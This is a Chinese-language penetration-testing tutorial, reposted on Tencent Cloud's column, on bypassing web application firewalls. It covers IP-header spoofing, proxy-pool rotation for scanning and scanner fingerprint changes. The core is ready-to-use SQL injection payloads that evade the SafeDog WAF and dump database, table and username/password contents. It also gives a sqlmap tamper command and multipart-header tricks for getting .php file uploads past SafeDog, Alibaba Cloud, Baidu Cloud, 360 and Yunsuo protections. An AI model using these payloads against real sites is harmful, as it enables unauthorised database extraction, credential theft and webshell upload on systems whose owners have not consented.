前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >一篇文章教给你Bypass学习基础

一篇文章教给你Bypass学习基础

作者头像
天钧
发布于 2020-09-30 02:45:34
发布于 2020-09-30 02:45:34
2.1K01
代码可运行
举报
文章被收录于专栏:渗透云笔记渗透云笔记
运行总次数:1
代码可运行

一、网站防护分类

1.源码防护:

使用过滤函数对恶意攻击进行过滤,绕过思路: ①大小写替换 ②变换提交方式:如get请求变post/cookie请求绕过 ③编码绕过:url编码、基于语句重叠、注释符等

2.软件WAF: 通过访问速度、指纹识别等特征进行拦截;常见软件WAF如安全狗、D盾、云锁、云盾等,软件WAF侧重拦截web漏洞。通过访问阈值的大小判断为CC攻击,进行IP封锁;

3.硬件WAF: 主要防御流量和部分web攻击。常见硬件WAF如天融信、深信服等厂商的防火墙。硬件WAF基于TCP三次握手封锁真实IP;

4.云WAF:

阿里云等


二、 WAF拦截方向

1.基于IP封锁

①基于HTTP请求头封锁IP 使用burp suite插件fake-ip进行绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
client-ip:1.1.1.1
x-forward-for:1.1.1.1

②基于TCP请求封锁IP

使用IP代理池不断切换真实IP

2.指纹识别-修改扫描工具特有指纹

每个扫描工具都有特定的指纹,这里说的指纹是指http请求头里面的User-Agent。WAF一旦识别到工具的指纹会直接封锁请求IP,所以在进行攻击时需要修改指纹欺骗WAF,不同工具的修改方式不同,具体百度:

DirBuster:

sqlmap:注入时添加–radom-agent参数,也可以使用–User-Agent="xx”参数指定指纹进行注入攻击

3.访问速度和web攻击 waf存在访问阈值,如果单个IP访问速度过快会被waf当作ddos或者cc攻击从而进行拦截。另外基于web层面的攻击也会被拦截,例如:在web页面进入sql注入或者xss的payload会被waf拦截关键字,进行文件上传时会检测上传文件后缀和文件内容等…

4.总结 从IP封锁、访问速度、指纹信息以及web攻击等多个维度进行bypass。


三、目录扫描

1.子域名查找域名查询利用第三方接口查询。避免waf拦截 ①shodan、fofa ②谷歌语法 ③其他接口

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://z.zcjun.com/
https://phpinfo.me/domain/
https://d.chinacycc.com/index.php?m=Login&a=index

2.目录扫描

使用代理池:ProxyPool-mater

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
项目地址:https://github.com/Python3WebSpider/ProxyPool

①本地安装redis,安装教程:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://www.runoob.com/redis/redis-install.html
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制

②运行代理池脚本,抓取代理IP并筛选然后存放到redis库里面:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#开启redis服务
cd ./redis
redis-server redis.windows.conf

#运行脚本ProxyPool-master
cd ./ProxyPool-master
python run.py

③运行成功后会在本机开放一个接口从而获取redis库里面的IP,并随机切换:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
接口地址:127.0.0.1:5555/random

④然后利用网站目录扫描脚本调用此IP进行目录扫描,脚本实现方式:

  • 加载同级目录字典进行扫描
  • 调用本地接口获取代理IP
  • 运行脚本,成功bypass

ps:sqlmap使用代理池IP:将IP保存在1.txt里面,使用–proxy-file="c:\1.txt"参数进行代理IP切换


四、手工注入

1.参数污染

①注释、空字符、内联注释、脏数据、单行注释、换行符等污染

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
access+asp空格:  %0a %0d %09 %20 + 

②长度污染:waf拦截长度有一定的限制,一般用与post提交的时候,使用垃圾字符提交内容导致内存溢出:

代码语言:javascript
代码运行次数:0
运行
复制
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
%%&%%%%%%%%%%%%%%%%%%%%%%%%%%0a
id=1&id=1&id=1&id=1&id=1&id=1&id=1 and 1=1
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制

③变换提交方式(服务器支持post、cookie传参)

  • 直接get提交被安全狗拦截:
  • 变换为post提交方式成功bypass:

2.实例:六条语句bypass安全狗

环境:安全狗4.0 IIS版本+mysql 5.4+IIS 7.5

第一种:特殊数字+内敛注释

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#在1-55000之间找特殊数字,这个数字表示数据库版本。数据库是4.45.09以上版本该语句才会被执行
id=-1%20union%20/*!44509select*/%201,2,3%23
id=-1%20union%20/*!44509select*/%201,%23x%0A/*!database*/(),3%23

ps:我发现在这个区间只要带44的数字都不拦截,不知道这是不是一枚彩蛋。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#找数字列
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,2,3,4,5,6,7,8,9,10
#数据库名
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,database%23%0a(),3,4,5,6,7,8,9,10
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#表名
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=0x7879636d73
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段名
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6d616e6167655f75736572
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段内容
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,group_concat(m_name,m_pwd),3,4,5,6,7,8,9,10 from manage_user

第二种union/%00/%23a%0A/!/!select 1,2,3*/;%23

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段数
?id=1/*%00*/%23a%0A/*!/*!order*/+/*%00*/%23a%0A/*!/*!by+3*/--+
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#数字列
?id=-1 union/*%00*/%23a%0A/*!/*!select 1,2,3*/;%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#数据库
?id=-1+union/*%00*/%23a%0A/*!/*!select 1,database%23%0a(),3*/;%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#表名
?id=-1+union/*%00*/%23a%0A/*!/*!select*/1,group_concat(%23%0atable_name),3 from information_schema.tables where table_schema=0x7365637572697479;%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段名
?id=-1+union/*%00*/%23a%0A/*!/*!select*/1,group_concat(%23%0acolumn_name),3 from information_schema.columns where table_name=0x7573657273;%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段内容
?id=-1+union/*%00*/%23a%0A/*!/*!select*/1,group_concat(%23%0a0x7E,username,password),3 from security.users;%23

第三种:/**&id=-1%20union%20select%201,2,3%23*/

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段数:
?id=1/**&id=1%20order by 3%23*/
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#数据库名
?id=1/**&id=-1%20union%20select%201,database(),3%23*/
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#表名
?id=1/**&id=-1%20union%20select%201,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23*/
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段名
?id=1/**&id=-1%20union%20select%201,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273%23*/
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段内容
?id=1/**&id=-1%20union%20select%201,group_concat(0x7e,username,password),3 from users%23*/

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段数
?id=1%20order%20%23%0a%20by%203%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#数据库
?id=-1%20union%20all%23%0a%20select%201,database%23%0a(),3%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#表名
?id=-1%20union%20all%23%0a%20select%201,group_concat(%23%0atable_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段名
?id=-1%20union%20all%23%0a%20select%201,group_concat(%23%0acolumn_name),3 from information_schema.columns where table_name=0x7573657273%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段内容
?id=-1%20union%20all%23%0a%20select%201,group_concat(%23%0a0x7e,username,password),3 from users%23

第五种:字符型

– - 是mysql的注释符 然后加上%0a 换行。安全狗正则匹配order by,union select。并不单纯匹配某一个单词函数-- -a%0a

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段数
?id=1 order -- -a%0a by 3%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#数据库
?id=-1 union-- -a%0a select 1,database-- -a%0a(),3%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#表名
?id=-1 union-- -a%0a select 1,group_concat(-- -a%0atable_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段名
?id=-1 union-- -a%0a select 1,group_concat(-- -a%0acolumn_name),3 from information_schema.columns where table_name=0x7573657273%23
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#字段内容
?id=-1 union-- -a%0a select 1,group_concat(-- -a%0a0x7e,username,password),3 from users%23

第六种:

贴图太累了,放弃

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#数据库
?id=\Nunion/*!14444select*/1,database(%23%0a),3

3. tamper编写

可以对已经存在的tamper加上上面的payload进行魔改,例如:在tamper versionedmorekeywords.py里面进行替换:

替换完成后使用该tamper就可以过狗了:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
sqlmap -u "http://192.168.198.129:86/Less-2/?id=1" --tamper=safedog.py --ramdom-agent --delay=0.5 

文件上传

环境同上。

①截断

②去掉引号

③引号

引号2

引号3

④filename

filename2

⑤换行

换行2


上传绕过思路

1.对文件的内容,数据。数据包进行处理。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Content-Disposition: form-data; name="file"; filename="ian.php"
# 将form-data;修改为~form-data,即:
Content-Disposition: ~form-data; name="file"; filename="ian.php"

2.通过替换大小写来进行绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Content-Disposition: form-data; name="file"; filename="yjh.php"
Content-Type: application/octet-stream
#将Content-Disposition修改为content-Disposition
Content-Disposition: form-data; name="file"; filename="yjh.php"
#将form-data修改为Form-data
Content-Disposition: Form-data; name="file"; filename="yjh.php"
#将Content-Type修改为content-Type
content-Type: application/octet-stream

3.通过删减空格来进行绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Content-Disposition: form-data; name="file"; filename="yjh.php"
Content-Type: application/octet-stream
将Content-Disposition: form-data //冒号后面 增加或减少一个空格
将form-data; name="file";   //分号后面 增加或减少一个空格
将Content-Type: application/octet-stream //冒号后面 增加一个空格

4.通过字符串拼接绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
看Content-Disposition: form-data; name="file"; filename="yjh3.php"
将 form-data 修改为   f+orm-data
将 from-data 修改为   form-d+ata

5.双文件上传绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<form action="https://www.xxx.com/xxx.asp(php)" method="post"
name="form1" enctype="multipart/form‐data">
<input name="FileName1" type="FILE" class="tx1" size="40">
<input name="FileName2" type="FILE" class="tx1" size="40">
<input type="submit" name="Submit" value="上传">
</form>

6.HTTP header 属性值绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Content-Disposition: form-data; name="file"; filename="yjh.php"
//通过替换form-data 为*来绕过
Content-Disposition: *; name="file"; filename="yjh.php"

7.HTTP header 属性名称绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"
删除掉ontent-Type: image/jpeg只留下c,将.php加c后面即可,但是要注意额,双引号要跟着c.php".

8.等效替换绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
原内容:
Content-Type: multipart/form-data; boundary=---------------------------471463142114
修改后:
Content-Type: multipart/form-data; boundary =---------------------------471463142114
boundary后面加入空格。

9.修改编码绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
使用UTF-16、Unicode、双URL编码等等

10.百度云上传绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"
或者:
filename='1.php(回车)'

11.阿里云上传绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
源代码:
Content-Disposition: form-data; name="img_crop_file"; filename="1.jpg .Php"Content-Type: image/jpeg
修改如下:
Content-Disposition: form-data; name="img_crop_file"; filename="1.php"=号这里回车删除掉Content-Type: image/jpeg即可绕过。

12.360主机上传绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下:
Content- Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
Content-Disposition 修改为 Content-空格Disposition

13.===绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Content- Disposition: form-data; name="upload"; filename==="1.php"

14.云锁上传绕过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Content- Disposition: form-data; name="up_picture"; filename==="123.
11.php"
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-09-24,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透云笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
Redis服务器被劫持风波
作者:当年的春天 来源: http://blog.csdn.net/zhanghan18333611647/article/details/57128279 前言 俗话说安全猛于虎,之前多多
小小科
2018/05/02
1.9K0
Redis服务器被劫持风波
防止自己服务器变矿机的软件_服务器被挖矿了怎么办
周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。我放下酸菜馅的包子,ssh连了一下,被拒绝了,问了下默认的22端口被封了。让运维的同事把端口改了一下,立马连上去,顺便看了一下登录名:root,还有不足8位的小白密码,心里一凉:被黑了!
全栈程序员站长
2022/11/10
1.7K0
防止自己服务器变矿机的软件_服务器被挖矿了怎么办
【教你搭建服务器系列】(7)一次服务器被黑的排查全过程
发现并没有异常的IP,这倒是不奇怪,假如真的被登录了,登录日志被删除的可能性也是很大的。
HaC
2021/12/07
1.1K0
【教你搭建服务器系列】(7)一次服务器被黑的排查全过程
Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析
1、CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发现CPU被大量占用。
追马
2020/07/06
3.4K0
Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析
基于腾讯云云服务器的rancher环境搭建
Rancher是一款开源企业级容器管理平台,提供全面、稳健的容器管理和官方支持。使用Rancher,我们可以快速轻松地运行和管理Docker和Kubernetes,构建自己的容器“牧场”。
buzzfrog
2024/01/04
7271
基于腾讯云云服务器的rancher环境搭建
【教你搭建服务器系列】(6)如何判断服务器被入侵
虽然你的网站是可以运行了,但想要网站 7*24 小时高可用不掉线,还远远不够,因为互联网还有一个看不见的手——入侵者。
HaC
2021/12/07
1.4K0
记一次Linux服务器被入侵变矿机
0x00 背景 周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。我放下酸菜馅的包子,ssh连了一下,被拒绝了,问了下默认的22端口被封了。让运维的同事把端口改了一下,立马连上去,顺便看了一下登录名:root,还有不足8位的小白密码,心里一凉:被黑了! 0x01 查找线索 服务器系统CentOS 6.X,部署了nginx,tomcat,redis等应用,上来先把
慕白
2018/07/06
3.1K1
记一次Linux被入侵,服务器变“矿机”全过程
出处:看雪社区:https://bbs.pediy.com/thread-225163.htm
帅地
2019/06/20
1.2K0
记一次Linux被入侵,服务器变“矿机”全过程
再次捕获云上在野容器攻击,TeamTNT黑产攻击方法揭秘
一、背景 腾讯安全云鼎实验室持续监控云原生在野攻击威胁态势,继DockerHub发现百万下载量黑产镜像(详见文章DockerHub再现百万下载量黑产镜像,小心你的容器被挖矿)之后,近期实验室最新捕获到TeamTNT黑客团队新型在野容器攻击活动,相比之前TeamTNT挖矿木马,此次新型攻击手法对原挖矿木马进行了升级,并利用容器环境进行感染传播。 通过对TeamTNT新型容器攻击样本详细分析,我们发现挖矿病毒是通过扫描docker remote api未授权访问漏洞进行传播。相比之前TeamTNT黑客团队出的
云鼎实验室
2021/10/20
1.6K0
8. 云服务器及 Docker 教程
如果 apt-get 下载软件速度较慢,可以参考清华大学开源软件镜像站中的内容,修改软件源。
浪漫主义狗
2022/10/09
7400
腾讯云服务器国际版如何安装??
在腾讯云服务器(CVM)上安装系统主要涉及创建实例时选择操作系统镜像,后续也可通过控制台更换系统。以下是详细步骤:
用户11534092
2025/02/27
3560
腾讯云服务器国际版如何安装??
Linux【问题记录 03】阿里云+腾讯云服务器挖矿木马 kthreaddk 处理记录+云服务器使用建议
有一段时间没有登录云服务器了,心里想着看看服务器有没有被木马占领,好巧不巧,阿里云和腾讯云都被占领了,更巧的是,都是 kthreaddk 进程,首先想到的是百度一下看看有没有解决办法,网上似乎只有 kthreaddi 相关的说明而且无法解决问题,之前处理过 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒所以有了一些思路。
yuanzhengme
2025/06/06
1110
腾讯云服务器linux 下的 work32 病毒查杀
最近发现多个云服务器新安装的centos 系统很卡,然而并未做什么。接着没过过久就收到系统提示被封禁了
用户10909539
2024/02/22
8490
腾讯云服务器linux 下的 work32 病毒查杀
云服务器中如何查看服务器具体运行哪些服务
不幸中的万幸,由于公司使用的是云服务器(天翼云),因此可以通过查看云服务器配置中的安全组信息。进一步确认当前服务器中开放了哪些端口,作为后续查找问题思路。既然聊到安全组,先来介绍一下安全组的概念。
舒一笑不秃头
2025/03/14
4880
云服务器中如何查看服务器具体运行哪些服务
TeamTNT 样本新变种分析
一、背景 云鼎实验室近期捕获到TeamTNT黑客团伙新的容器攻击活动。挖矿病毒通过扫描docker remote api未授权访问漏洞进行传播。相比之前TeamTNT黑客团伙使用的挖矿木马,新变种对原挖矿木马进行了升级,在进行感染时使用了新的策略。 入侵后会先清理其他挖矿病毒,并使用新的方法隐藏进程,入侵完毕后会清理痕迹,覆盖系统日志以逃避排查,为增加挖矿木马植入的成功率还有备用挖矿程序,增加木马的稳定性,利用nohup命令防止挖矿进程被挂断,并且使用了LKM rootkit技术隐藏进程。 样本属于最新版
云鼎实验室
2021/10/19
1.8K0
玩转服务器---云服务器的选购
最近在准备部署个人博客到线上,需要购买一个云服务器,其实选择有挺多,比较热门的例如阿里云,腾讯云,金山云,百度云等,我博客第一版是采用的阿里云,当时因为对windows系统比较熟悉,所以选择了阿里云windows操作系统的云服务器,这次主要是想玩下linux系统,所以这次架构我放弃了更熟悉的windows版本,我选择了腾讯云 CentOS 7.2 64位的云服务器。
创译科技
2019/06/02
12.1K0
服务器遭遇挖矿:追踪与解决之路
nc命令检查22端口是否开放,返回拒绝,然而如果端口没有开的话应该返回timeout,refused代表sshd进程没起来或者已经挂掉了。
叔牙
2024/01/23
1K0
服务器遭遇挖矿:追踪与解决之路
服务器被黑该如何查找入侵、攻击痕迹
当公司的网站服务器被黑,被入侵导致整个网站,以及业务系统瘫痪,给企业带来的损失无法估量,但是当发生服务器被攻击的情况,作为服务器的维护人员应当在第一时间做好安全响应,对服务器以及网站应以最快的时间恢复正常运行,让损失减少到最低,针对于黑客攻击的痕迹应该如何去查找溯源,还原服务器被攻击的现场,SINE安全公司制定了详细的服务器被黑自查方案。
网站安全专家
2019/07/24
4.1K0
服务器被黑该如何查找入侵、攻击痕迹
Docker容器挖矿应急实例
很多开源组件封装成容器镜像进行容器化部署在提高应用部署效率和管理便捷性的同时,也带来了一些安全挑战。一旦开源系统出现安全漏洞,基于资产测绘就很容易关联到开源组件,可能导致被批量利用。
Bypass
2023/09/01
6900
Docker容器挖矿应急实例
[叶子]在自己的服务器上搭建自己的邮箱
这可能是我写的文章中为数不多的有全程完整截图的、不是在完工后再来回忆的文章,但并不是因为我一开始就打算写这篇教程,而是搭建邮箱这玩意我做了”双份“——先在我自己的服务器上面给我自己搭建,确认成功了、各项功能都正常了我才在 @gaoice 的服务器上面搭建,并同时边搭建边截图,之所以我写这个,是因为我在给自己的服务器搭建的时候走了太多的弯路,过程太曲折,以至于在完工之后我觉得有必要写这么一篇文章来记录这个过程。但是我并不打算在这篇文章里面详细讲我走的弯路的具体情况,这篇文章主要还是讲搭建这件事本身。
冰漪叶
2022/10/24
10.3K0
[叶子]在自己的服务器上搭建自己的邮箱
推荐阅读
相关推荐
Redis服务器被劫持风波
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档